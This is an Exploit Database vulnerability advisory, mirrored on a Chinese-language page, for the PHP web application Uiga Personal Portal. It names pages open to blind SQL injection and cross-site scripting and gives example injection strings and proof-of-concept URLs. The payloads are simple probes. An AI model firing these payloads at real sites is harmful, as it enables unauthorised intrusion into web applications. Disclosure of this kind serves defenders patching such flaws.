Uiga Personal Portal – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： Eyup CELIK
  日期： 2011-10-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18002/

• # Exploit Title: Uiga Personal Portal Multiple Vulnerability
  # Date: 2011
  # Author: Eyup CELIK
  # Version: All Version
  # Tested on: All versions are Vulnerability
  # Web Site: www.eyupcelik.com.tr
  
  
  ISSUE
  
  Blind SQL Injection and XSS can be done using the command input
  
  Vulnerable Page:
  index.php
  cart.php
  includes/photoview.php
  index2.php
  
  Example:
  index.php?exhort=%24<Blind SQL Injection Code>&view=ar_det
  cart.php/<XSS Code>
  includes/photoview.php/<XSS Code>
  index2.php/<XSS Code>
  
  
  Exploit:
  index.php?exhort=%2440-2+2*3-6&view=ar_det
  cart.php/"onmouseover=prompt(955787)>
  includes/photoview.php/"onmouseover=prompt(955787)>
  index2.php/"onmouseover=prompt(955787)>
  
  
  POC:
  127.0.0.1/uigaportal/index.php?exhort=%2440-2+2*3-6&view=ar_det
  127.0.0.1/uigaportal/cart.php/%22onmouseover=prompt(955787)%3E